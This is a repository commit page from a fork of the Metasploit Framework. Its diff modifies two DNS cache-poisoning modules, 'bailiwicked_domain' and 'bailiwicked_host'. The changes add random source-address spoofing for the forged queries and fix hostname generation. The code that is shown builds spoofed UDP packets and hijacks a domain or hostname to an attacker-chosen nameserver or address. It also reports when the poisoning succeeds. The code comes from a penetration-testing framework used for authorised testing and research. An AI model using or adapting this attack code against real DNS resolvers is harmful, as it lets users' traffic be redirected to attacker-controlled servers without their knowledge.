dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Adds an option to randomize the source address of the queries as well as some cosmetic changes. The tuning code should be forwarding queries properly now. 

git-svn-id: file:///home/svn/framework3/trunk@5602 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
HD Moore 2008-07-26 04:35:28 +00:00
parent 9b56053974
commit b4fc255a41
2 changed files with 27 additions and 12 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

17
modules/auxiliary/spoof/dns/bailiwicked_domain.rb
View File

@ -43,6 +43,7 @@ class Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary
register_options(
[
OptEnum.new('SRCADDR', [true, 'The source address to use for sending the queries', 'Real', ['Real', 'Random'], 'Real']),
OptPort.new('SRCPORT', [true, "The target server's source query port (0 for automatic)", nil]),
OptString.new('DOMAIN', [true, 'The domain to hijack', 'example.com']),
OptString.new('NEWDNS', [true, 'The hostname of the replacement DNS server', nil]),
@ -136,6 +137,7 @@ class Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary
def run
target = rhost()
source = Rex::Socket.source_address(target)
saddr = datastore['SRCADDR']
sport = datastore['SRCPORT']
domain = datastore['DOMAIN'] + '.'
newdns = datastore['NEWDNS']
@ -279,10 +281,15 @@ class Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary
req.rd = 1
src_ip = source
if(saddr == 'Random')
src_ip = Rex::Text.rand_text(4).unpack("C4").join(".")
end
buff = (
Scruby::IP.new(
#:src => barbs[0][:addr].to_s,
:src => source,
:src => src_ip,
:dst => target,
:proto => 17
)/Scruby::UDP.new(
@ -350,7 +357,7 @@ class Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary
answer = Resolv::DNS::Message.decode(answer)
answer.each_answer do |name, ttl, data|
if((name.to_s + ".") == domain and data.name.to_s == newdns)
print_status("Poisoning successful after #{queries} attempts: #{domain} == #{newdns}")
print_status("Poisoning successful after #{queries} queries and #{responses} responses: #{domain} == #{newdns}")
srv_sock.close
disconnect_ip
return
@ -385,7 +392,7 @@ class Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary
times = []
hostname = Rex::Text.rand_text_alphanumeric(16) + domain
hostname = Rex::Text.rand_text_alphanumeric(16) + '.' + domain
sock = Rex::Socket.create_udp(
'PeerHost' => server,
@ -413,7 +420,7 @@ class Auxiliary::Spoof::Dns::BailiWickedDomain < Msf::Auxiliary
times << [Time.now.to_f - q_beg_t, cnt]
cnt = 0
hostname = Rex::Text.rand_text_alphanumeric(16) + domain
hostname = Rex::Text.rand_text_alphanumeric(16) + '.' + domain
Thread.critical = false

22
modules/auxiliary/spoof/dns/bailiwicked_host.rb
View File

@ -36,12 +36,14 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
register_options(
[
OptEnum.new('SRCADDR', [true, 'The source address to use for sending the queries', 'Real', ['Real', 'Random'], 'Real']),
OptPort.new('SRCPORT', [true, "The target server's source query port (0 for automatic)", nil]),
OptString.new('HOSTNAME', [true, 'Hostname to hijack', 'pwned.example.com']),
OptAddress.new('NEWADDR', [true, 'New address for hostname', '1.3.3.7']),
OptAddress.new('RECONS', [true, 'The nameserver used for reconnaissance', '208.67.222.222']),
OptInt.new('XIDS', [true, 'The number of XIDs to try for each query (0 for automatic)', 0]),
OptInt.new('TTL', [true, 'The TTL for the malicious host entry', 31337]),
], self.class)
end
@ -49,7 +51,7 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
def auxiliary_commands
return {
"check" => "Determine if the specified DNS server (RHOST) is vulnerable",
"racer" => "Determine the size of the window for the target server"
"racer" => "Determine the size of the window for the target server",
}
end
@ -129,6 +131,7 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
def run
target = rhost()
source = Rex::Socket.source_address(target)
saddr = datastore['SRCADDR']
sport = datastore['SRCPORT']
hostname = datastore['HOSTNAME'] + '.'
address = datastore['NEWADDR']
@ -271,10 +274,15 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
req.rd = 1
src_ip = source
if(saddr == 'Random')
src_ip = Rex::Text.rand_text(4).unpack("C4").join(".")
end
buff = (
Scruby::IP.new(
#:src => barbs[0][:addr].to_s,
:src => source,
:src => src_ip,
:dst => target,
:proto => 17
)/Scruby::UDP.new(
@ -342,7 +350,7 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
answer = Resolv::DNS::Message.decode(answer)
answer.each_answer do |name, ttl, data|
if((name.to_s + ".") == hostname and data.address.to_s == address)
print_status("Poisoning successful after #{queries} attempts: #{name} == #{address}")
print_status("Poisoning successful after #{queries} queries and #{responses} responses: #{name} == #{address}")
disconnect_ip
return
end
@ -374,7 +382,7 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
times = []
hostname = Rex::Text.rand_text_alphanumeric(16) + domain
hostname = Rex::Text.rand_text_alphanumeric(16) + '.' + domain
sock = Rex::Socket.create_udp(
'PeerHost' => server,
@ -402,7 +410,7 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
times << [Time.now.to_f - q_beg_t, cnt]
cnt = 0
hostname = Rex::Text.rand_text_alphanumeric(16) + domain
hostname = Rex::Text.rand_text_alphanumeric(16) + '.' + domain
Thread.critical = false
@ -454,6 +462,6 @@ class Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary
# XXX: We should subtract the timing from the target to us (calculated based on 0.50 of our non-recursive query times)
avg_count
end
end
end